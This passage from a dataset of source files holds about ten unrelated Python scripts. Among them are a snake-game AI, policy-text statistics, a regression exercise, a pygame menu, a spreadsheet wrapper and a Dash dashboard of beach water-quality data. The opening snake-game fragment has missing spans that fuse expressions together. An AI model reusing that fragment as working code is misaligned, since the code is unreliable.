getBodies(data)\n movedUp, movedDown, movedRight, movedLeft = assign(target)\n moveList = [movedUp, movedDown, movedRight, movedLeft]\n moveScore = [None, None, None, None]\n for m in range(4):\n if not moveList[m] in body and -1= len(mybody) or head == myhead:\n can_go = False\n if can_go:\n areas = assign(head)\n for coord in areas:\n if coord in bodies:\n bodies.pop(bodies.index(coord))\n else:\n ret.append(coord)\n return ret\n\n\ndef i_am_closest(heads, myhead, target):\n for head in heads:\n if distance_between(head, target) < distance_between(myhead, target):\n return False\n return True\n\n\n\n\ndef trapped(bodies, target, data, shouldPrint):\n movedUp, movedDown, movedRight, movedLeft = 
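# getPossibleMoves above reads as a flood fill that counts reachable board
# squares, but parts of its body (and of the functions after it) are missing
# here. A minimal reachable-area count under the same data layout
# ({'x': .., 'y': ..} dicts) for reference; reachable_area is an illustrative
# name, not a reconstruction of the original function:
def reachable_area(bodies, start, width, height):
    blocked = {(b['x'], b['y']) for b in bodies}
    seen, stack = set(), [(start['x'], start['y'])]
    while stack:
        x, y = stack.pop()
        if (x, y) in seen or (x, y) in blocked:
            continue
        if not (0 <= x < width and 0 <= y < height):
            continue
        seen.add((x, y))
        stack.extend([(x + 1, y), (x - 1, y), (x, y + 1), (x, y - 1)])
    return len(seen)

assert reachable_area([], {'x': 0, 'y': 0}, 2, 2) == 4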
assign(target)\n moveList = [movedUp, movedDown, movedRight, movedLeft]\n moveScore = [None, None, None, None]\n for m in range(4):\n if not moveList[m] in bodies and -1= 2020)].index)) # 保留2010-2019\r\n print(tempdf.shape)\r\n dflist.append(tempdf)\r\n# dfdict = dict(zip(provls, dflist))\r\ndf = pd.concat(dflist)\r\ndf.to_csv(r'D:\\3policyAyc\\_database\\_policytxt\\Wordlist_all0.csv', encoding=\"utf_8_sig\", index=False)\r\n\r\nfun_statis = Fun_statis() # initialize the class\r\n# df_nation = pd.read_excel(r'./txtdata/nationalPolicy.xlsx')\r\n# df_guangdong = pd\r\n# df.jiangsu = pd\r\n# df1 = df[1:5]\r\n# df3 = df1.drop(index=df1.loc[[\"通知\" in x for x in df1['title'].values.tolist()]].index)\r\n# df3 = df1.drop(index=df2.index)\r\n# df_check = df.loc[[\"目录\" in x for x in df['title'].values.tolist()]] # 取索引为2的行\r\n\"\"\"1.政策发布时间分布,2010-2019的文本\"\"\"\r\nyearlist = df['year'].tolist()\r\nsyear = pd.Series(yearlist)\r\ncountDict = dict(syear.value_counts()) # frequency calculation\r\ntemp_df1 = pd.DataFrame(data=countDict, index = ['Count'])\r\nproportionDict = dict(syear.value_counts(normalize=True))\r\ntemp_df2 = pd.DataFrame(data=proportionDict, index = ['Frequency'])\r\nyear_df = pd.concat([temp_df1,temp_df2])\r\nyear_df.to_excel('./_database/_interresults/stat_by_year.xlsx')\r\n\r\n\r\n\"\"\"2.政策发布机构分析\"\"\"\r\nbodies = fun_statis.issuersplit(df['issuer'].tolist()) # extract policy issuers\r\nbodyDic = pd.Series(bodies).value_counts()\r\ntempbodydf = pd.DataFrame(data=bodyDic)\r\ntempbodydf.to_excel('D:/3policyAyc/Rawpolicybodies.xlsx')\r\n\r\n# simplify and merge similar bodies\r\nsimpbodyDict = fun_statis.bodySimplify(bodyDic)\r\ndf_body = pd.DataFrame(data=simpbodyDict, index=['Count'])\r\ndf_body.to_excel('D:/3policyAyc/_database/_interresults/stat_by_issuer.xlsx') # 测试,找出发布频率高的主体\r\n\r\n\"\"\"3.词频分布统计\"\"\"\r\nwordlist, ptextlist = [],[]\r\nfor entry in df['ptext'].tolist():\r\n temp = entry.split('\\n')\r\n ptextlist.append(temp)\r\n wordlist.extend(temp)\r\n# 统计词频\r\nwordfreq = collections.Counter(wordlist)\r\nmostfreqlist = wordfreq.most_common(100) # 查看出现频率最高的n个词\r\ntempk, tempv = [],[]\r\nfor tup in mostfreqlist:\r\n tempk.append(tup[0])\r\n tempv.append(tup[1])\r\nmostfreqdic = {'Word': tempk, 'Count': tempv}\r\ndf_mostfreq = pd.DataFrame(mostfreqdic)\r\n# wordfreq = wordseries.value_counts(normalize=True)\r\ndf_mostfreq.to_excel('D:/3policyAyc/_database/_interresults/wordfreq_distribution.xlsx')\r\n\r\n# tf-idf\r\n# ptextDict = corpora.Dictionary(ptextlist)\r\n# corpus_ptext = [ptextDict.doc2bow(w) for w in ptextlist] # doc2bow(1,2)表示第*篇文档中编号1的单词出现2次\r\n# tf_idf_model = TfidfModel(corpus_ptext, normalize=True)\r\n# word_tf_idf = list(tf_idf_model[ptextDict.token2id])\r\n# count = 0\r\n# for it in word_tf_idf:\r\n# count+= len(it)\r\n# print(count)\r\n# sorted_words = sorted(b.items(), key=lambda x: x[1], reverse=True)\r\n# tfidf_df = pd.DataFrame([(tup[0],tup[1]) for a in word_tf_idf for tup in a], columns=['Word','Code'])\r\n# tokenid_df = pd.DataFrame([(k,v) for k,v in ptextDict.items()], columns=['Code', 'TF-IDFvalue'])\r\n# tf_idfDic = {} # 结果转为字典形式\r\n# for it in word_tf_idf:\r\n# for tup in it:\r\n# tf_idfDic.update({tup[0]:tup[1]})\r\n# tokenid_df = pd.DataFrame(data=ptextDict.token2id, columns=['Word','Code'])\r\n# tokenid_df['Code'].dtype\r\n# tfidf_df = pd.DataFrame(data=tf_idfDic, index=['Code', 'TF-IDFvalue'])\r\n# tfidf_df['Code'].dtype\r\n#\r\n# wordtfidf\r\n# DDI = cordi.id2token\r\n#\r\n#\r\n#\r\n# organs = []\r\n# pat = re.compile(r'/|[ ]+|、|,|//|,')\r\n# 
pat1 = re.compile(r'[\\\\u3000]+|[\\u3000]+|[\\xa0]+|[?]+')\r\n# for it in organlist:\r\n# if isinstance(it,str):\r\n# if re.search(pat1,it):\r\n# tmp = ''.join(re.split(pat1,it))\r\n# organs.extend(re.split(pat,tmp))\r\n# else:\r\n# organs.extend(re.split(pat,it))\r\n#\r\n# from collections import Counter\r\n# orgcount = Counter(organs)\r\n# orgcount.pop('')\r\n# orgcount.pop('建设部(已撤销)')\r\n# for k,v in orgcount.items():\r\n# if '委员会' in k:\r\n# k_new = k.replace('委员会','委')\r\n# orgcount[k_new] = orgcount.pop(k)\r\n# orgcount\r\n#\r\n# def getMatch(pat, sstr = '财政部科技部工业和信息化部发展改革委'):\r\n# '''获取所有匹配的部分及其索引,返回tuple_list\r\n# pat:正则匹配表达式\r\n# sstr:待搜索的字符串\r\n# '''\r\n# if re.search(pat,sstr):\r\n# all_ind = []\r\n# all_find = re.findall(pat,sstr)\r\n# for it in all_find:\r\n# all_ind.append(sstr.index(it))\r\n# sstr = sstr.replace(it,'爨',1)\r\n# mat_tuple = tuple(zip(all_find,all_ind))\r\n# return list(mat_tuple)\r\n# else:\r\n# print('Nothing had been matched to the given string!')\r\n# return\r\n#\r\n# pat2 = '部|局|委'\r\n# div_list = []\r\n# for k,v in list(orgcount.items()):\r\n# # count.append(v)\r\n# # ss = pd.Series(count)\r\n# # ss.value_counts()\r\n# if len(re.findall(pat2,k))>=2:\r\n# matlist = getMatch(pat2,k)\r\n# tmp_dic = {}\r\n# for i,tup in enumerate(matlist):\r\n# new_key = ''\r\n# if i == 0:\r\n# new_key = k[0:tup[1]+1]\r\n# else:\r\n# new_key = k[matlist[i-1][1]+1:tup[1]+1]\r\n# tmp_dic.update({new_key:v})\r\n# div_list.append(tmp_dic)\r\n#\r\n# for dic in div_list:\r\n# for dic_k in dic.keys():\r\n# if dic_k in orgcount:\r\n# td = {dic_k:dic.get(dic_k)+orgcount.get(dic_k)}\r\n# orgcount.pop(dic_k)\r\n# orgcount.update(td)\r\n# else:\r\n# orgcount.update({dic_k:dic.get(dic_k)})\r\n#\r\n# for k,v in list(orgcount.items()):\r\n# if len(re.findall(pat2,k))>=2:\r\n# orgcount.pop(k)\r\n# orgcount\r\n# org_bac = orgcount.copy()\r\n# orgcount = org_bac.copy()\r\n#\r\n# for k in list(orgcount.keys()):\r\n# tl = re.split(pat2,k)\r\n# if len(tl)>1 and tl[1]:\r\n# tl[0] = tl[0]+re.search(pat2,k).group()\r\n# if tl[0] in orgcount:\r\n# td = {tl[0]:orgcount.get(k)+orgcount.get(tl[0])}\r\n# orgcount.pop(k)\r\n# orgcount.pop(tl[0])\r\n# orgcount.update(td)\r\n# else:\r\n# orgcount[tl[0]] = orgcount.pop(k)\r\n#\r\n# df_organ = pd.DataFrame.from_dict(orgcount, orient='index',columns=['pieces'])\r\n# df_organ = df_organ.reset_index().rename(columns = {'index':'organization'})\r\n# df_organ.to_excel('./_interresults/by_organ1.xlsx')\r\n","sub_path":"statAyc/policyDistribution.py","file_name":"policyDistribution.py","file_ext":"py","file_size_in_byte":7103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"365186856","text":"# Linear regression\n\nimport os \nimport pandas as pd \nimport matplotlib.pyplot as plt \nimport numpy as np \n\nimport module_ex1 as ex1\n\n\n\"\"\" =================== Main ex1data1 ============================ \"\"\"\n# import data and visualize data\ndata = pd.read_csv('ex1data1.txt', header=None,names=['Population','Profit'])\ndata.plot(kind='scatter', x='Population', y='Profit', figsize=(12,8))\n\nalpha = 0.01 # Learning rate\niters = 1000 # Interation number of gradient descent\ng, cost = ex1.perform(data, np.zeros((1, 2)), alpha, iters)\n\n# view the results\nx = np.linspace(data.Population.min(), data.Population.max(), 100)\nf = g[0,0] + (g[0,1] * x)\n\nfig, ax = plt.subplots(figsize=(12,8))\nax.plot(x, f, 'r', label='Prediction')\nax.scatter(data.Population, data.Profit, label='Training data')\nax.legend(loc = 
2)\nax.set_xlabel('Population')\nax.set_ylabel('Profit')\nax.set_title('Predicted profit vs. Population Size')\n\nfig, ax = plt.subplots(figsize=(12,8))\nax.plot(np.arange(iters), cost, 'r')\nax.set_xlabel('Iterations')\nax.set_ylabel('Cost')\nax.set_title('Error vs. Training Epoch')\n\n\"\"\" ==================Main ex1data2==================== \"\"\"\ndata = pd.read_csv('ex1data2.txt', header = None, names=['Size','Bedrooms','Price'])\ndata = (data - data.mean()) / data.std() # features normalization\n\n#define\nalpha = 0.01\niters = 750\ng, cost = ex1.perform(data, np.zeros((1, 3)), alpha, iters)\n\nfig, ax = plt.subplots(figsize=(12,8))\nax.plot(np.arange(iters), cost, 'r')\nax.set_xlabel('Iterations')\nax.set_ylabel('Cost')\nax.set_title('Error vs. Training Epoch aaa')\n\nplt.show()\n","sub_path":"ex1/ex1.py","file_name":"ex1.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"482428453","text":"from datetime import date, datetime\nfrom typing import List\n\nfrom fastapi import APIRouter, HTTPException, Request, Body\nfrom pydantic import BaseModel\nfrom requests import HTTPError\nfrom structlog import get_logger\n\nfrom .. import config\n\nfrom elasticsearch import Elasticsearch\n\nfrom ..search.search_index import query_question\n\nrouter = APIRouter()\nlog = get_logger()\n\n\nclass Answers(BaseModel):\n answers: List[str]\n\nclass ElasticResults(BaseModel):\n doc_text: List[str]\n doc_url: str\n section_text: List[str]\n section_url: str\n\nconf = config.get()\n\nes = Elasticsearch(\n [{\"host\": conf.elastic_search_host, \"port\": 443}],\n use_ssl=True,\n verify_certs=True,\n)\n\n\n# @router.get(\"/answers/\", response_model=Answers)\n@router.get(\"/answers/\")\ndef answers(request: Request, data=Body(dict())):\n\n log.debug('data',data=data)\n question = data['question']\n print(question)\n print(request)\n\n log.info(\"answers\", question=question)\n\n language = request.headers.get('Accept-Language')\n\n res_doc_txt, res_sec_txt = query_question(es, question, language)\n\n # answer = Answers.parse_obj(res_sec_txt)\n\n return language\n","sub_path":"covidfaq/routers/answers.py","file_name":"answers.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"35372688","text":"import pygame\r\nfrom pygame.locals import *\r\nfrom sys import exit\r\nimport os\r\n\r\ndef main():\r\n pygame.init()\r\n\r\n arquivo = open(\"Tela.txt\", \"r\")\r\n conteudo = arquivo.read()\r\n arquivo.close()\r\n\r\n #DEFINICAO DA TELA\r\n tamanho_da_tela = largura, altura = 800, 600\r\n pygame.display.set_caption(\"Batalha Naval - Creditos\")\r\n if conteudo == \"Tela Cheia\":\r\n tela = pygame.display.set_mode( tamanho_da_tela, FULLSCREEN, 32 )\r\n elif conteudo == \"Janela\":\r\n tela = pygame.display.set_mode( tamanho_da_tela, 0, 32 )\r\n\r\n #MUSICA\r\n pygame.mixer.music.load(\"audio\" + os.sep + \"sub_menu.mp3\")\r\n pygame.mixer.music.play(-1)\r\n\r\n sobre_opcao = pygame.mixer.Sound(\"audio\" + os.sep + \"sobre_opcao.wav\")\r\n escolhe_opcao = pygame.mixer.Sound(\"audio\" + os.sep + \"escolhe_opcao.wav\")\r\n som1 = False\r\n\r\n #CARREGANDO IMAGENS\r\n jaca_game = pygame.image.load(\"imagens\" + os.sep + \"jacagame.png\").convert_alpha()\r\n creditos = pygame.image.load(\"imagens\" + os.sep + \"creditos.jpg\").convert()\r\n mira = pygame.image.load(\"imagens\" + os.sep + \"mira.png\")\r\n\r\n #BOTAO MENU 
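# module_ex1's perform() is not shown in this file; the batch gradient-descent
# update it appears to wrap is sketched below (assuming numpy; X carries a
# leading column of ones, theta is a 1 x n row vector):
import numpy as np

def gradient_descent(X, y, theta, alpha, iters):
    m = len(y)
    cost = np.zeros(iters)
    for i in range(iters):
        error = X @ theta.T - y
        theta = theta - (alpha / m) * (error.T @ X)    # simultaneous update
        cost[i] = float((error ** 2).sum() / (2 * m))  # squared-error cost
    return theta, cost

X = np.array([[1.0, 1.0], [1.0, 2.0]])
y = np.array([[1.0], [2.0]])
theta, cost = gradient_descent(X, y, np.zeros((1, 2)), 0.1, 200)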
PRINCIPAL\r\n lista_botoes_menu_principal = [pygame.image.load(\"imagens\" + os.sep + \"menu_principal\" + str(indice + 1) + \".png\").convert() for indice in range(3)]\r\n botao_menu_principal = lista_botoes_menu_principal[0]\r\n medida_menu_principal = botao_menu_principal.get_size()\r\n posicao_menu_principal = (500, 500)\r\n\r\n #DESABILITA O CURSOR DO MOUSE\r\n pygame.mouse.set_visible(False)\r\n\r\n pressionado = False\r\n \r\n while True:\r\n #CAPTURA A POSICAO DO MOUSE\r\n posicao_mouse = pygame.mouse.get_pos()\r\n posicao_mouse_mira = (posicao_mouse[0] - 29, posicao_mouse[1] - 29)\r\n\r\n #CAPTURA EVENTOS PELO MOUSE\r\n clique_mouse = pygame.mouse.get_pressed()\r\n\r\n for event in pygame.event.get():\r\n if event.type == QUIT:\r\n exit()\r\n\r\n if event.type == KEYDOWN:\r\n if event.key == K_ESCAPE:\r\n pygame.mixer.music.stop()\r\n return\r\n\r\n\r\n #MENU PRINCIPAL(BOTAO DE VOLTAR)\r\n if posicao_menu_principal[0] <= posicao_mouse[0] <= posicao_menu_principal[0] + medida_menu_principal[0] and posicao_menu_principal[1] <= posicao_mouse[1] <= posicao_menu_principal[1] + medida_menu_principal[1]:\r\n botao_menu_principal = lista_botoes_menu_principal[1]\r\n if som1 == False:\r\n sobre_opcao.play()\r\n som1 = True\r\n if clique_mouse[0]:\r\n botao_menu_principal = lista_botoes_menu_principal[2]\r\n pressionado = True\r\n if pressionado and not clique_mouse[0]:\r\n if som1 == True:\r\n escolhe_opcao.play()\r\n som1 = False\r\n pygame.mixer.music.stop()\r\n return\r\n else:\r\n botao_menu_principal = lista_botoes_menu_principal[0]\r\n som1 = False\r\n\r\n if not clique_mouse[0]:\r\n pressionado = False\r\n \r\n tela.blit(creditos, (0,0) )\r\n tela.blit(jaca_game, (300,250) )\r\n tela.blit(botao_menu_principal, posicao_menu_principal)\r\n tela.blit(mira, posicao_mouse_mira)\r\n\r\n pygame.display.flip()\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"Creditos.py","file_name":"Creditos.py","file_ext":"py","file_size_in_byte":3329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"130818799","text":"import xlsxwriter as xlsx\nclass SpreadSheetManager():\n def __init__(self, filename):\n # Manage a spread sheet for PDielec / PDGui\n self.workbook = xlsx.Workbook(filename)\n self.tab_names = ['Main', 'Settings', 'Scenarios', 'Molar Absorption','Absorption', 'Real Permittivity', 'Imaginary Permittivity', 'ATR Reflectance','Analysis']\n self.worksheets = {}\n # Positions points to where we write to next\n self.positions = {}\n self.max_col = {}\n self.max_row = {}\n for tab in self.tab_names:\n self.worksheets[tab] = self.workbook.add_worksheet(tab)\n self.positions[tab] = (0,0)\n self.max_col[tab] = 0\n self.max_row[tab] = 0\n self.name = 'Main'\n\n def selectWorkSheet(self,name):\n self.name = name\n\n def writeNextRow(self,items, row=None, col=None, check=''):\n oldRow,oldCol = self.positions[self.name]\n if col is None:\n col = oldCol\n if row is None:\n row = oldRow\n if col == 0:\n print('We have a problem, col is 0')\n self.write(row,0,check)\n for item in items:\n #print('writing ', row, col, item)\n self.write(row, col, item)\n col += 1\n row += 1\n\n def write(self,row,col,item):\n self.worksheets[self.name].write(row,col,item)\n self.max_col[self.name] = max(self.max_col[self.name], col)\n self.max_row[self.name] = max(self.max_row[self.name], row)\n self.positions[self.name] = (row+1,col+1)\n \n def delete(self):\n for row in range(0,self.max_row[self.name]):\n for col in range(0, self.max_col[self.name]):\n 
self.worksheets[self.name].write(row,col,'')\n self.positions[self.name] = (-1,0)\n self.max_col[self.name] = 0\n self.max_row[self.name] = 0\n\n def close(self):\n self.workbook.close()\n","sub_path":"Python/GUI/SpreadSheetManager.py","file_name":"SpreadSheetManager.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"163943539","text":"\"\"\"\nDefining Generator related views.\n\"\"\"\n\nfrom django.views import generic\nfrom .utils import get_lottery_numbers\n\nclass IndexView(generic.ListView):\n \"\"\"\n Define the basic view to show the lottery numbers.\n \"\"\"\n\n template_name = 'generator/index.html'\n context_object_name = 'lottery_number_list'\n\n def get_queryset(self):\n \"\"\"\n Returns a list of random lottery number options.\n \"\"\"\n return [get_lottery_numbers()]\n","sub_path":"website/generator/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"302955153","text":"import pandas as pd\r\nimport numpy as np\r\nimport seaborn as sns\r\nimport plotly.express as px\r\nimport plotly.graph_objs as go\r\nimport plotly.figure_factory as ff\r\n\r\n\r\n# reads the csv and parses the dateTime column\r\ndf = pd.read_csv('df_english.csv', sep=';', index_col=0, parse_dates=['dateTime'])\r\n\r\nfeatures_points = pd.read_excel('features_points.xlsx')\r\n\r\nmap1 = px.scatter_mapbox(\r\n features_points, lat='lat', lon='long', hover_data=['point', 'balneary', 'reference', 'location', 'fresh_water', 'drenage_beach', 'drenage_point'], \r\n mapbox_style='carto-positron', center={\"lat\": -27.61587, \"lon\": -48.48378}, zoom=8)\r\n\r\nyears = list(df.dateTime.dt.year.unique())\r\nyears.append('All the years')\r\npoints = list(df.point.sort_values().unique())\r\nstats_list = ['Description of the data (df.describe())', 'Stats of E. Coli per point', \r\n 'Balneability condition per point', 'Stats of E. Coli and amount of rain', \r\n 'Stats of E. Coli per beach and point that have drenages', 'Stats of E. Coli per year',\r\n 'Stats of E. 
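# SpreadSheetManager above is a thin wrapper over xlsxwriter's Workbook API.
# The underlying calls in miniature (assuming xlsxwriter is installed; the
# filename is illustrative):
import xlsxwriter

workbook = xlsxwriter.Workbook('demo.xlsx')
sheet = workbook.add_worksheet('Main')
sheet.write(0, 0, 'hello')   # write(row, col, value), zero-indexed
workbook.close()             # data is only flushed to disk on close()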
Coli per month']\r\n\r\n#-----------------------------------------------------------------------------\r\n### Summary Stats\r\n\r\ndescribe = df.describe().reset_index()\r\n\r\nsummary_stats_point = df.groupby('point').agg({'dateTime': 'count', 'e_coli': ['mean', 'median', 'var', 'std']}).reset_index()\r\nsummary_stats_point.columns = summary_stats_point.columns.droplevel()\r\n\r\ncross_condit = pd.crosstab(df.point, df.condition, margins=True, margins_name='Total of measures').reset_index()\r\ncross_condit['Percentage Not Good'] = cross_condit['IMPRÓPRIA'] / cross_condit['Total of measures'] * 100\r\ncross_condit['Percentage Good'] = cross_condit['PRÓPRIA'] / cross_condit['Total of measures'] * 100\r\ncross_condit['Percentage Indeterminate'] = cross_condit['INDETERMINADO'] / cross_condit['Total of measures'] * 100\r\ncross_condit\r\n\r\nsummary_stats_rain = df.groupby('rain')['e_coli'].agg(['mean', 'median', 'var', 'std']).reset_index()\r\n\r\nsummary_stats_drenage = df.groupby(['fresh_water', 'drenage_beach', 'drenage_point'])['e_coli'].agg(['mean', 'median', 'var', 'std']).reset_index()\r\n\r\nsummary_stats_year = df.groupby(df.dateTime.dt.year).agg({'dateTime': 'count', 'e_coli': ['mean', 'median', 'var', 'std']}).reset_index()\r\nsummary_stats_year.columns = summary_stats_year.columns.droplevel()\r\n\r\nsummary_stats_month = df.groupby(df.dateTime.dt.month).agg({'dateTime': 'count', 'e_coli': ['mean', 'median', 'var', 'std']}).reset_index()\r\nsummary_stats_month.columns = summary_stats_month.columns.droplevel()\r\n\r\n#-----------------------------------------------------------------------------\r\n### Dashboard\r\n\r\nimport dash\r\nimport dash_core_components as dcc\r\nimport dash_html_components as html\r\nfrom dash.dependencies import Input, Output\r\nimport dash_table\r\n\r\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\r\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets) \r\n\r\napp.layout = html.Div([\r\n html.Div([\r\n html.H1(\r\n children='Balneability Analysis | Florianópolis - SC, Brazil',\r\n style={\r\n 'textAlign' : 'center',\r\n }\r\n ),\r\n dcc.Graph(id='map1', figure=map1)\r\n ]),\r\n \r\n html.Div([\r\n html.Div([\r\n dcc.Markdown('''###### Point'''), \r\n dcc.Dropdown(\r\n id='drop_point1',\r\n options=[{'label': i, 'value': i} for i in points],\r\n ),\r\n dcc.Markdown('''###### Year'''),\r\n dcc.Dropdown(\r\n id='drop_years1',\r\n options=[{'label': i, 'value': i} for i in years],\r\n value='All the years'\r\n ),\r\n dcc.Graph(id='graph1'),\r\n dcc.Graph(id='graph3'),\r\n dcc.Graph(id='graph5'),\r\n dcc.Graph(id='graph7'),\r\n ], className='six columns'),\r\n html.Div([\r\n dcc.Markdown('''###### Point'''), \r\n dcc.Dropdown(\r\n id='drop_point2',\r\n options=[{'label': i, 'value': i} for i in points],\r\n ),\r\n dcc.Markdown('''###### Year'''),\r\n dcc.Dropdown(\r\n id='drop_years2',\r\n options=[{'label': i, 'value': i} for i in years],\r\n value='All the years'\r\n ),\r\n dcc.Graph(id='graph2'),\r\n dcc.Graph(id='graph4'),\r\n dcc.Graph(id='graph6'),\r\n dcc.Graph(id='graph8'),\r\n ], className='six columns'),\r\n ]),\r\n \r\n html.Div([\r\n html.H4(\r\n children='Stats Tables',\r\n style={\r\n 'textAlign' : 'center',\r\n }\r\n ),\r\n dcc.Dropdown(\r\n id='drop_stats',\r\n options=[{'label': i, 'value': i} for i in stats_list],\r\n ),\r\n dash_table.DataTable(\r\n id='table',\r\n page_size=10,\r\n data=[],\r\n ),\r\n html.H1(\r\n children='__________________________________________',\r\n style={\r\n 'textAlign' : 
'center',\r\n }\r\n ),\r\n html.H6(\r\n children='Data source: https://balneabilidade.ima.sc.gov.br/',\r\n style={\r\n 'textAlign' : 'center',\r\n }\r\n ),\r\n html.H6(\r\n children='Created by: Andhros Guimarães e David Guimarães',\r\n style={\r\n 'textAlign' : 'center',\r\n }\r\n ),\r\n html.H1(\r\n children='-----------------------------------------',\r\n style={\r\n 'textAlign' : 'center',\r\n }\r\n ),\r\n ]),\r\n\r\n])\r\n\r\n@app.callback(\r\n [dash.dependencies.Output('graph1', 'figure'),\r\n dash.dependencies.Output('graph3', 'figure'),\r\n dash.dependencies.Output('graph5', 'figure'),\r\n dash.dependencies.Output('graph7', 'figure')],\r\n [dash.dependencies.Input('drop_point1', 'value'),\r\n dash.dependencies.Input('drop_years1', 'value')]\r\n)\r\n\r\ndef update_graph(pointN, yearsN):\r\n \r\n if yearsN == 'All the years':\r\n filtered_df = df[df.point == pointN].sort_values(by='dateTime')\r\n \r\n else:\r\n filtered_df = df[(df.point == pointN) & (df.dateTime.dt.year == yearsN)].sort_values(by='dateTime')\r\n \r\n graph1 = px.histogram(filtered_df, x=\"e_coli\", marginal=\"rug\",\r\n histnorm='percent', range_x=[0, 25000], nbins=25, \r\n title='Histogram - Percentage of measures x values of E. Coli')\r\n \r\n graph3 = px.violin(filtered_df, y='e_coli', title='Violin Plot - Distribution of E. Coli Values')\r\n \r\n graph5 = px.box(filtered_df, y='e_coli', title='Box plot - Distribution of E. Coli Values')\r\n \r\n graph7 = px.line(filtered_df, x='dateTime', y='e_coli', hover_data=df.columns,\r\n title='Time Series - Values of E. Coli')\r\n \r\n return graph1, graph3, graph5, graph7\r\n\r\n@app.callback(\r\n [dash.dependencies.Output('graph2', 'figure'),\r\n dash.dependencies.Output('graph4', 'figure'),\r\n dash.dependencies.Output('graph6', 'figure'),\r\n dash.dependencies.Output('graph8', 'figure')],\r\n [dash.dependencies.Input('drop_point2', 'value'),\r\n dash.dependencies.Input('drop_years2', 'value')]\r\n)\r\n\r\ndef update_graph2(pointN2, yearsN2):\r\n if yearsN2 == 'All the years':\r\n filtered_df1 = df[df.point == pointN2].sort_values(by='dateTime')\r\n \r\n else:\r\n filtered_df1 = df[(df.point == pointN2) & (df.dateTime.dt.year == yearsN2)].sort_values(by='dateTime')\r\n\r\n graph2 = px.histogram(filtered_df1, x=\"e_coli\", marginal=\"rug\",\r\n histnorm='percent', range_x=[0, 25000], nbins=25,\r\n title='Histogram - Percentage of measures x values of E. Coli')\r\n \r\n graph4 = px.violin(filtered_df1, y='e_coli', title='Violin Plot - Distribution of E. Coli Values')\r\n \r\n graph6 = px.box(filtered_df1, y='e_coli', title='Box plot - Distribution of E. Coli Values')\r\n \r\n graph8 = px.line(filtered_df1, x='dateTime', y='e_coli', hover_data=df.columns,\r\n title='Time Series - Values of E. Coli')\r\n\r\n return graph2, graph4, graph6, graph8\r\n\r\n\r\n@app.callback(\r\n [dash.dependencies.Output('table', 'data'),\r\n dash.dependencies.Output('table', 'columns')],\r\n [dash.dependencies.Input('drop_stats', 'value')],\r\n)\r\n\r\ndef update_stats_table(df):\r\n \r\n if df is None:\r\n columns = []\r\n data = []\r\n \r\n elif df == 'Description of the data (df.describe())':\r\n table = describe\r\n columns = [{\"name\": i, \"id\": i} for i in table.columns]\r\n data = table.to_dict('rows')\r\n \r\n elif df == 'Stats of E. 
Coli per point':\r\n table = summary_stats_point\r\n columns = [{\"name\": i, \"id\": i} for i in table.columns]\r\n data = table.to_dict('rows')\r\n \r\n elif df == 'Balneability condition per point':\r\n table = cross_condit\r\n columns = [{\"name\": i, \"id\": i} for i in table.columns]\r\n data = table.to_dict('rows')\r\n \r\n elif df == 'Stats of E. Coli and amount of rain':\r\n table = summary_stats_rain\r\n columns = [{\"name\": i, \"id\": i} for i in table.columns]\r\n data = table.to_dict('rows')\r\n \r\n elif df == 'Stats of E. Coli per beach and point that have drenages':\r\n table = summary_stats_drenage\r\n columns = [{\"name\": i, \"id\": i} for i in table.columns]\r\n data = table.to_dict('rows')\r\n \r\n elif df == 'Stats of E. Coli per year':\r\n table = summary_stats_year\r\n columns = [{\"name\": i, \"id\": i} for i in table.columns]\r\n data = table.to_dict('rows')\r\n \r\n elif df == 'Stats of E. Coli per month':\r\n table = summary_stats_month\r\n columns = [{\"name\": i, \"id\": i} for i in table.columns]\r\n data = table.to_dict('rows')\r\n \r\n return data, columns\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run_server(debug=True)","sub_path":"Dash_EDA_english.py","file_name":"Dash_EDA_english.py","file_ext":"py","file_size_in_byte":9983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"645085934","text":"import nltk\nimport glob\n\nnltk.download('punkt')\n\nfiles_path = './brat-project-essays/*.txt'\noutput_path = './corpus_sents.txt'\n\nall_sents = []\nfor p in glob.glob(files_path):\n\tcontent = open(p).read()\n\tsents = nltk.sent_tokenize(content.decode('utf8'))\n\tall_sents = all_sents + sents\n\nall_sents = list(map(lambda x: x.encode('utf8') + '\\n', all_sents))\nopen(output_path, 'w').writelines(all_sents)","sub_path":"preprocessing/essays2sents.py","file_name":"essays2sents.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"5697916","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Sep 26 19:35:28 2018\r\n\r\n@author: Shree\r\n\"\"\"\r\n\r\n\"\"\"from tkinter import *\r\n\r\nmaster = Tk()\r\nLabel(master, text=\"First Name\").grid(row=0)\r\nLabel(master, text=\"Last Name\").grid(row=1)\r\n\r\ne1 = Entry(master)\r\ne2 = Entry(master)\r\n\r\ne1.grid(row=0, column=1)\r\ne2.grid(row=1, column=1)\r\n\r\n\r\nmainloop( )\"\"\"\r\n\r\nfrom tkinter import *\r\nroot = Tk()\r\nroot.geometry(\"200x100\")\r\n\r\ndef retrieve_input():\r\n inputval = textBox.get(\"1.0\",\"end-1c\")\r\n print (inputval)\r\n\r\ntextBox = Text(root, height=2, width=10)\r\ntextBox.pack()\r\n\r\nbuttonCommit = Button(root, height=1, width=2, text=\"Commit\", \r\n 